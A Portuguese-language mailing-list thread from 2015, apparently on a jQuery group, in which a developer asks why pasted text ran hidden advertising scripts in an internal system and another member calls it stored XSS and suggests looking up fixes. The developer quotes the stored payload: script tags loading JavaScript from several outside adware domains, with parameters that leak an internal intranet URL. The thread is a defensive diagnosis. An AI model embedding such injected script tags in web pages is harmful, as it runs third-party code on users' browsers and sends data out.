Link oculto em texto
21 views
Skip to first unread message
RD
Feb 9, 2015, 1:22:56 PM2/9/15
to jque...@googlegroups.com
Pessoal, gostaria de utilizar o conhecimento de vocês,
um usuário do sistema foi realizar uma atualização com um texto qualquer que ele copiou de um outro sistema(acredito que no navegador dele tem instalado um plugin algo assim), quando ele efetuou o gravação do texto um link oculto chamando javascripts que carregam propaganda de um tal de lyrics começou a abrir na tela dessa gravação, mas o que me deixou preocupado é que ele não gravou como texto ele gravou de uma outra forma, assim o html assumiu como uma chamada normal de script.
alguém saberia me dizer o que é ? sobre o que pesquisar ?
Rudnei Teixeira Lucas
Feb 10, 2015, 4:25:00 AM2/10/15
to jque...@googlegroups.com
Olá,
isso me parece uma falha de XSS, veja no banco de dados quais informações ele gravou. Lá é onde você vai conseguir a sua resposta.
Abraços.
Rudnei Lucas
RD
Feb 10, 2015, 5:11:35 AM2/10/15
to jque...@googlegroups.com
isso foi o que gravou juntamente com o text, como eu faria para evitar isso ?
Produção\r\n<script type=\"text/javascript\" src=\"http://asrv-a.akamaihd.net/sd/9631/1001.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://ugc.dreamforcesaction.com/affs?addonname=%5BEnter%20Product%20Name%5D&affid=9631&subaffid=1001&subID=undefined&clientuid=undefined&origaffid=9631&origsubaffid=1001&href=http%3A%2F%2F192.%2Fintra%2Fsgc%2Fv2%2Fchamados%2Fview%2F93317&arm=\"></script>\r\n<script type=\"text/javascript\" src=\"http://fuq.coldfootage.com/amz/aeyJhZmZpZCI6OTA5MCwic3ViYWZmaWQiOjMwMDAsInJldmVudWVzX2FmZmlkIjo5NjMxLCJyZXZlbnVlc19zdWJhZmZpZCI6MTAwMSwiaHJlZiI6Imh0dHA6Ly8xOTIuOS4xLjEwMC9pbnRyYW5ldC9zZ2MvdjIvY2hhbWFkb3Mvdmlldy85MzMxNyIsIndpZHRoIjoxMjk2LCJoZWlnaHQiOjgxMCwiZ2xidiI6Im8xMmUyNjAzMDAiLCJhZGRvbm5hbWUiOiJMeXJpY3MifQ%3D%3D.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://cdn.visadd.com/script/14567725690/preload.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://cdn.visadd.com/script/14567725798/preload.js\"></script>\r\n<script charset=\"UTF-8\" type=\"text/javascript\" src=\"http://i.izerjs.info/izer/javascript.js?channel=rvzr9631_1001_br&country=br&appTitle=Lyrics&plink=http%3A%2F%2Fnsl.mapticket.net%2Fsd%2Fapps%2Fadinfo-1.1%2Findex.html%3Fbj1MeXJpY3MmaD11Z2MuZHJlYW1mb3JjZXNhY3Rpb24uY29tJm89ZHAmYT05NjMxJnM9MTAwMSZjPWdyZWVuJnc9MTkyLjkuMS4xMDAmb291PWh0dHA6Ly91Z2MuZHJlYW1mb3JjZXNhY3Rpb24uY29tL29wdF9vdXQvMQ%3D%3D\"></script>\r\n<script type=\"text/javascript\" src=\"http://istatic.datafastguru.info/ss/min/revzqca.js?subid=9631_1001\"></script>\r\n<iframe style=\"display: none;\"></iframe>\r\n<script charset=\"UTF-8\" type=\"text/javascript\" src=\"http://luu.lightquartrate.com/sd/apps/honeybadger/honeybadger-2.0.0.js\"></script>\r\n<script type=\"text/javascript\" src=\"http://a.visadd.com/internal/blocked?v=2&subid=br_9631_1001&format=1&ai=992&ctxu=14567725690&sid=14567725798\"></script>. '
Rudnei Teixeira Lucas
Feb 10, 2015, 5:21:48 AM2/10/15
to jque...@googlegroups.com
Tae,
XSS injection rsrsrs...
Existem muitas formas de se tratar esse tipo de problema. Mas cada plataforma tem suas ferramentas.
Recomendo dar uma "googlada" por "xss injection fix" e procurar a melhor tratativa para seu backend (PHP, Java, Ruby,...) e no seu front-end também.
Só fique atento e corrija, pois isso pode te dar uma boa dor de cabeça.
Boa sorte.
Abraços,
Rudnei Lucas
RD
Feb 10, 2015, 5:29:22 AM2/10/15
to jque...@googlegroups.com
Obrigado Rudnei
Reply all
Reply to author
Forward
0 new messages